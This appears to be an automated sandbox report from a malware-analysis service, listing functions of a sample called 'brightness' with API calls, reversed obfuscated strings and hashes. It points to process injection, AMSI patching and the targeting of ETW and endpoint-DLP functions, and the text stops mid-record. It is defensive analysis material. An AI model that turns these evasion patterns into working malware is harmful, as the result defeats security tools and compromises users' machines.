API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 468cd4ef04ead44a4b0280cf67761c18fb39b8097909c7e24805790f5c1c32f8
Instruction ID: d85ceebfab643525363890a1d83cd204cee1350fa8695ba75dda6018339f139e
Opcode Fuzzy Hash: 468cd4ef04ead44a4b0280cf67761c18fb39b8097909c7e24805790f5c1c32f8
Instruction Fuzzy Hash: AE118C7D64020CBFEB01EFA8DC41EAEB7EEEB48710F414861B900D7250DB74EA149BA1

Function 028479AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02848018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02848088,?,?,00000000,?,028479FE,ntdll,00000000,00000000,02847A43,?,?,00000000), ref: 02848056
Part of subcall function 02848018: GetModuleHandleA.KERNELBASE(?), ref: 0284806A

Part of subcall function 028480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02848148,?,?,00000000,00000000,?,02848061,00000000,KernelBASE,00000000,00000000,02848088), ref: 0284810D
Part of subcall function 028480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02848113
Part of subcall function 028480C0: GetProcAddress.KERNEL32(?,?), ref: 02848125

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02847A1F

Strings

yromeMlautriVetacollAwZ, xrefs: 028479C7
ntdll, xrefs: 028479F4

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 857be1942e6805cb42fea4ecdd278b03264c2d713d7e1bb76b5cd4f217ade5b7
Instruction ID: cc2ccbcf4bafd88ea69f951586fe26e121b791b9232706b5da4d75222f1e71f7
Opcode Fuzzy Hash: 857be1942e6805cb42fea4ecdd278b03264c2d713d7e1bb76b5cd4f217ade5b7
Instruction Fuzzy Hash: 38118C7D64020CBFEB01EFA8DC41E9EB7EEEB48710F414861B900D7250DB74EA149BA1

Function 0284824C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02848018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02848088,?,?,00000000,?,028479FE,ntdll,00000000,00000000,02847A43,?,?,00000000), ref: 02848056
Part of subcall function 02848018: GetModuleHandleA.KERNELBASE(?), ref: 0284806A

Part of subcall function 028480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02848148,?,?,00000000,00000000,?,02848061,00000000,KernelBASE,00000000,00000000,02848088), ref: 0284810D
Part of subcall function 028480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02848113
Part of subcall function 028480C0: GetProcAddress.KERNEL32(?,?), ref: 02848125

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 028482BD

Strings

yromeMlautriVdaeRtN, xrefs: 02848267
ntdll, xrefs: 02848294

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2521977463-737317276
Opcode ID: 710ae77c2c684bab1d6ded55f0d3de867f387fb164d97ff62566a7abb258dd54
Instruction ID: 3122142554b09214bfe88c943780bde6766687343cce7942bf73707a77b5b48a
Opcode Fuzzy Hash: 710ae77c2c684bab1d6ded55f0d3de867f387fb164d97ff62566a7abb258dd54
Instruction Fuzzy Hash: AB018C7D600208BFEB01EFACDC41EAE77EEEB49710F458860B904D7650DA74AD109B65

Function 02847CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02848018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02848088,?,?,00000000,?,028479FE,ntdll,00000000,00000000,02847A43,?,?,00000000), ref: 02848056
Part of subcall function 02848018: GetModuleHandleA.KERNELBASE(?), ref: 0284806A

Part of subcall function 028480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02848148,?,?,00000000,00000000,?,02848061,00000000,KernelBASE,00000000,00000000,02848088), ref: 0284810D
Part of subcall function 028480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02848113
Part of subcall function 028480C0: GetProcAddress.KERNEL32(?,?), ref: 02848125

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02847D6C

Strings

yromeMlautriVetirW, xrefs: 02847D13
Ntdll, xrefs: 02847D43

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: ade7fa21b3d13f7b00c38fbd0601979fa0af1ac5f5b99291662113ab5cf9858f
Instruction ID: 0739465de6201af623f1bea04a773dc2a00899d97244bba2ed2f1087029dfb2e
Opcode Fuzzy Hash: ade7fa21b3d13f7b00c38fbd0601979fa0af1ac5f5b99291662113ab5cf9858f
Instruction Fuzzy Hash: 2101697D610208BFEB01EFA8D841EAAB7EDEB48710F514860B900D3694CA74A9148BA1

Function 028484BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02848018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02848088,?,?,00000000,?,028479FE,ntdll,00000000,00000000,02847A43,?,?,00000000), ref: 02848056
Part of subcall function 02848018: GetModuleHandleA.KERNELBASE(?), ref: 0284806A

Part of subcall function 028480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02848148,?,?,00000000,00000000,?,02848061,00000000,KernelBASE,00000000,00000000,02848088), ref: 0284810D
Part of subcall function 028480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02848113
Part of subcall function 028480C0: GetProcAddress.KERNEL32(?,?), ref: 02848125

NtUnmapViewOfSection.NTDLL(?,?), ref: 02848521

Strings

noitceSfOweiVpamnUtN, xrefs: 028484D7
ntdll, xrefs: 02848504

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 3503870465-2520021413
Opcode ID: 2c1945564a5d942ac9708e1032abb79b7afb73be1a7538860e4ec3ccd996268e
Instruction ID: 04733f8badbd9f140ac07d3828498e43e04f3700886c3fa104dd331c1cf53d67
Opcode Fuzzy Hash: 2c1945564a5d942ac9708e1032abb79b7afb73be1a7538860e4ec3ccd996268e
Instruction Fuzzy Hash: 6D01627C65020CBFEB01EFA8DC41E5EB7AEEB49710F568860B800D7654DE74A9049A61

Function 0284DE24 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL(?,?), ref: 0284DEA0
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0284DEF2), ref: 0284DEB6
NtDeleteFile.NTDLL(?), ref: 0284DED5

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Path$DeleteFileInitNameName_StringUnicode
String ID:
API String ID: 1459852867-0
Opcode ID: 52e1fb45a29d04c11583b96508c58aface3e66d91779042a166e94a38d5f1ec3
Instruction ID: 2aa9b7a60c7cab951127e28a1019dfb2d6cbf1930d5f7282465fe14900e1c4c1
Opcode Fuzzy Hash: 52e1fb45a29d04c11583b96508c58aface3e66d91779042a166e94a38d5f1ec3
Instruction Fuzzy Hash: 4901867EA4434C6FEB05EBE4CD81BCD77BDAB55704F5000E29200E6192DF74AB098B62

Function 0284DE78 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02834ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02834EDA

RtlInitUnicodeString.NTDLL(?,?), ref: 0284DEA0
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0284DEF2), ref: 0284DEB6
NtDeleteFile.NTDLL(?), ref: 0284DED5

Part of subcall function 02834C0C: SysFreeString.OLEAUT32(0284ED84), ref: 02834C1A

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 1694942484-0
Opcode ID: 6e9ae6dd5ac1fd05f347857e42273f45046971c336678ac9330fb7c53f47f77d
Instruction ID: 81c1b28aa10492775030d6f84e1fc1efc620532d4c6a3f7a5d30f66b19bad4be
Opcode Fuzzy Hash: 6e9ae6dd5ac1fd05f347857e42273f45046971c336678ac9330fb7c53f47f77d
Instruction Fuzzy Hash: C101E17DA4020CBBEB11EAE4CD51FDEB3BDDB58700F5044A1A600E2581EB74AB048A65

Function 02846D48 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02846CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02846D39,?,?,?,00000000), ref: 02846D19

CoCreateInstance.OLE32(?,00000000,00000005,02846E2C,00000000,00000000,02846DAB,?,00000000,02846E1B), ref: 02846D97

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 01b523a6a43c03a0dec3a1d736cd65714ce78a1144f0e2f4cc67476dab357ce1
Instruction ID: c797a9f688213294967b544ef6fed879c4f5b083022462b74d80e4f493208cf9
Opcode Fuzzy Hash: 01b523a6a43c03a0dec3a1d736cd65714ce78a1144f0e2f4cc67476dab357ce1
Instruction Fuzzy Hash: 4A01F77D60871C6FF715DF68DC1296B7BEDE74AB10B614835F501D2640FA359900C8A5

Function 02857CAC Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0284881C: LoadLibraryA.KERNEL32(00000000,00000000,02848903), ref: 02848850
Part of subcall function 0284881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02848903), ref: 02848860
Part of subcall function 0284881C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 02848879
Part of subcall function 0284881C: FreeLibrary.KERNEL32(74AD0000,00000000,02892388,Function_000065D8,00000004,02892398,02892388,000186A3,00000040,0289239C,74AD0000,00000000,00000000,00000000,00000000,02848903), ref: 028488E3

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029867DC,02986820,OpenSession,0289237C,0285B40C,UacScan,0289237C), ref: 0285826D
ResumeThread.KERNEL32(00000000,ScanBuffer,0289237C,0285B40C,OpenSession,0289237C,0285B40C,UacScan,0289237C,0285B40C,ScanBuffer,0289237C,0285B40C,OpenSession,0289237C,0285B40C), ref: 028588B7
CloseHandle.KERNEL32(00000000,ScanBuffer,0289237C,0285B40C,OpenSession,0289237C,0285B40C,UacScan,0289237C,0285B40C,00000000,ScanBuffer,0289237C,0285B40C,OpenSession,0289237C), ref: 02858A36

Part of subcall function 02848798: LoadLibraryW.KERNEL32(bcrypt,?,000006A8,00000000,028923A4,0284A3BF,ScanString,028923A4,0284A774,ScanBuffer,028923A4,0284A774,Initialize,028923A4,0284A774,UacScan), ref: 028487AC
Part of subcall function 02848798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028487C6
Part of subcall function 02848798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000006A8,00000000,028923A4,0284A3BF,ScanString,028923A4,0284A774,ScanBuffer,028923A4,0284A774,Initialize), ref: 02848802

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,0289237C,0285B40C,UacInitialize,0289237C,0285B40C,ScanBuffer,0289237C,0285B40C,OpenSession,0289237C,0285B40C,UacScan,0289237C), ref: 02858E28

Part of subcall function 02837E10: GetFileAttributesA.KERNEL32(00000000,?,0284FD00,ScanString,0289237C,0285B40C,OpenSession,0289237C,0285B40C,ScanString,0289237C,0285B40C,UacScan,0289237C,0285B40C,UacInitialize), ref: 02837E1B

Part of subcall function 0284DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0284DFD2), ref: 0284DF3F
Part of subcall function 0284DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0284DF79
Part of subcall function 0284DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0284DFA6
Part of subcall function 0284DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0284DFAF

Part of subcall function 02848184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0284820E), ref: 028481F0

ExitProcess.KERNEL32(00000000,OpenSession,0289237C,0285B40C,ScanBuffer,0289237C,0285B40C,Initialize,0289237C,0285B40C,00000000,00000000,00000000,ScanString,0289237C,0285B40C), ref: 0285AE59

Strings

NtDeviceIoControlFile, xrefs: 0285A4E4
NtSetSecurityObject, xrefs: 02858DFA
DlpGetWebSiteAccess, xrefs: 0285A045
EnumServicesStatusExA, xrefs: 0285A52F
CreateProcessAsUserW, xrefs: 0285A589, 0285A5A7
ScanBuffer, xrefs: 028580AD, 0285837A, 02858520, 028586AD, 02858841, 028589C0, 02858C37, 02858D2F, 0285914B, 02859424, 02859598, 028597CE, 02859860, 02859B98, 02859F36, 0285A465, 0285AD6B
NtOpenObjectAuditAlarm, xrefs: 02858DAA
NtCreateSection, xrefs: 0285AAA9
RtlQueryProcessDebugInformation, xrefs: 0285A502
SLGetGenuineInformation, xrefs: 028599CE
CreateProcessWithLogonW, xrefs: 0285A598
ntdll, xrefs: 02858DAF, 02858DFF, 02858E13, 0285A187, 0285A1BA, 0285A1ED, 0285A220, 0285A253, 0285A9F4, 0285AA27, 0285AA5A, 0285AA8D, 0285AAC0, 0285AAF3, 0285AB26, 0285AB59, 0285AB8C, 0285ABBF, 0285ABF2, 0285AC25, 0285AC58, 0285AC8B, 0285ACBE
CreateProcessA, xrefs: 0285A55C
Ntdll, xrefs: 0285A4DA, 0285A4E9, 0285A4F8, 0285A507
MiniDumpWriteDump, xrefs: 02858DD2
VirtualProtect, xrefs: 0285A69E
psapi, xrefs: 0285A552
NtAlertResumeThread, xrefs: 0285A170
FlushInstructionCache, xrefs: 0285A737
C:\Windows\System32\, xrefs: 02858237
sppc, xrefs: 028599E5, 02859A18, 02859A4B, 02859A7E, 0285A98E, 0285A9C1
Initialize, xrefs: 02857D34, 02857F24, 02858F31, 02859B1C, 02859EBA, 0285A3E9, 0285A7A3, 0285ACEF
NtQueryDirectoryFile, xrefs: 0285A4F3
VirtualAlloc, xrefs: 0285A638
LdrLoadDll, xrefs: 0285ABA8
EnumServicesStatusA, xrefs: 0285A511
OpenSession, xrefs: 02857CB8, 02857E2C, 02857EA8, 028581A5, 028582FE, 028584A4, 02858631, 028587C5, 02858944, 02858A47, 02858BBB, 02858E39, 02859029, 0285931A, 028594A0, 028596D6, 028598DC, 02859AA0, 02859D8F, 02859E3E, 0285A07E, 0285A275, 0285A36D, 0285A81F, 0285ADE7
EnumServicesStatusW, xrefs: 0285A520
sppwmi, xrefs: 0285A95B
endpointdlp, xrefs: 02859FC3, 02859FF6, 0285A029, 0285A05C
CreateProcessW, xrefs: 0285A56B
mssip32, xrefs: 02859CF1
GetProcessMemoryInfo, xrefs: 02859CA7
SxTracerGetThreadContextDebug, xrefs: 02859C41, 0285A911
SLGetSLIDList, xrefs: 02859A01
DlpGetArchiveFileTraceInfo, xrefs: 0285A012
UacInitialize, xrefs: 02858CB3, 028590CF
NtQuerySecurityObject, xrefs: 0285AB42
SLGatherMigrationBlob, xrefs: 0285A977
NtWaitForSingleObject, xrefs: 0285A1D6
SLGetEncryptedPIDEx, xrefs: 0285A9AA
NtGetWriteWatch, xrefs: 0285A9DD
SLIsGenuineLocalEx, xrefs: 02859A34
spp, xrefs: 02859C58, 02859C8B, 0285A928
tquery, xrefs: 02859C25
DlpCheckIsCloudSyncApp, xrefs: 02859FDF
advapi32, xrefs: 02858DC3
WriteVirtualMemory, xrefs: 0285A704
I_QueryTagInformation, xrefs: 02858DBE
bcrypt, xrefs: 02859E1C
psapi, xrefs: 02859CBE
EtwEventWriteEx, xrefs: 0285AC74
DllGetClassObject, xrefs: 02859C74, 0285A944
NtAccessCheck, xrefs: 0285AB75
CryptSIPVerifyIndirectData, xrefs: 02859CDA
NtQuerySystemInformation, xrefs: 0285A4D5
NtQueryVirtualMemory, xrefs: 0285AA10
Advapi, xrefs: 0285A516, 0285A525, 0285A534, 0285A543, 0285A57F, 0285A58E, 0285A59D
OpenProcess, xrefs: 0285A6D1
Kernel32, xrefs: 0285A561, 0285A570, 0285A5AC
LdrGetProcedureAddress, xrefs: 0285ABDB
NtOpenProcess, xrefs: 02858E0E
NtOpenSection, xrefs: 0285AA76
NtMapViewOfSection, xrefs: 0285AADC
kernel32, xrefs: 0285A64F, 0285A682, 0285A6B5, 0285A6E8, 0285A71B, 0285A74E, 0285A781
RtlCreateQueryDebugBuffer, xrefs: 0285A23C
RetailTracerEnable, xrefs: 02859C0E
EnumProcessModules, xrefs: 0285A54D
ScanString, xrefs: 02857DB0, 0285801C, 02858AC3, 02858EB5, 0285929E, 0285965A, 02859958, 02859D13, 0285A0FA, 0285A2F1, 0285A89B
VirtualAllocEx, xrefs: 0285A66B
NtWriteVirtualMemory, xrefs: 0285AC0E
EtwEventWrite, xrefs: 0285ACA7
NtReadVirtualMemory, xrefs: 0285AB0F
dbgcore, xrefs: 02858DD7, 02858DEB
NtOpenFile, xrefs: 0285AC41
BCryptVerifySignature, xrefs: 02859E05
DlpNotifyPreDragDrop, xrefs: 02859FAC
RtlAllocateHeap, xrefs: 0285A1A3, 0285A209
MiniDumpReadDumpStream, xrefs: 02858DE6
NtQueryInformationThread, xrefs: 0285AA43
SLLoadApplicationPolicies, xrefs: 02859A67
SetUnhandledExceptionFilter, xrefs: 0285A76A
CreateProcessAsUserA, xrefs: 0285A57A
EnumServicesStatusExW, xrefs: 0285A53E
UacScan, xrefs: 02857FA0, 02858129, 02858282, 02858428, 028585B5, 02858749, 028588C8, 02858B3F, 02858FAD, 028591C7, 028593A8, 0285951C, 02859752, 0285A5C2

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 2481178504-1225450241
Opcode ID: 80d853a3546ed3a284e82a17138ad19bb4c234a105335f35ead77c5d53e9573f
Instruction ID: 918c008190a66055c59f2e552652ce9226c1623399d9184d1546946fcfaea4a5
Opcode Fuzzy Hash: 80d853a3546ed3a284e82a17138ad19bb4c234a105335f35ead77c5d53e9573f
Instruction Fuzzy Hash: 3B430D7DA1012C8BDB21EB68DD809DE73B6EFA4304F1080E5E509DB759DB70AE858F52

Function 02831724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 028317D0
Sleep.KERNEL32(0000000A,00000000), ref: 028317E6

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e2ee88285229ea5924c3a56facb9ad777706057530e193865f3b53e45149bd79
Instruction ID: ba416a552bc2d73b153c520df68db67eb11ff161e906e0eec6c31bab46c13664
Opcode Fuzzy Hash: e2ee88285229ea5924c3a56facb9ad777706057530e193865f3b53e45149bd79
Instruction Fuzzy Hash: 72B1127EA002918BDB16CF2CE888365BBE1FB94715F5886AAD54ECB3C5C7709461CBD0

Function 02848704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 0284870D

Part of subcall function 028480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02848148,?,?,00000000,00000000,?,02848061,00000000,KernelBASE,00000000,00000000,02848088), ref: 0284810D
Part of subcall function 028480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02848113
Part of subcall function 028480C0: GetProcAddress.KERNEL32(?,?), ref: 02848125

Part of subcall function 02847CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02847D6C

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0284876C

Strings

amsi, xrefs: 02848708
W, xrefs: 02848719
DllGetClassObject, xrefs: 02848732

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: 2e49418a818ffe17aa24abccc8b4ab0ed3f7d93e83e532d1073caf0d7b365b26
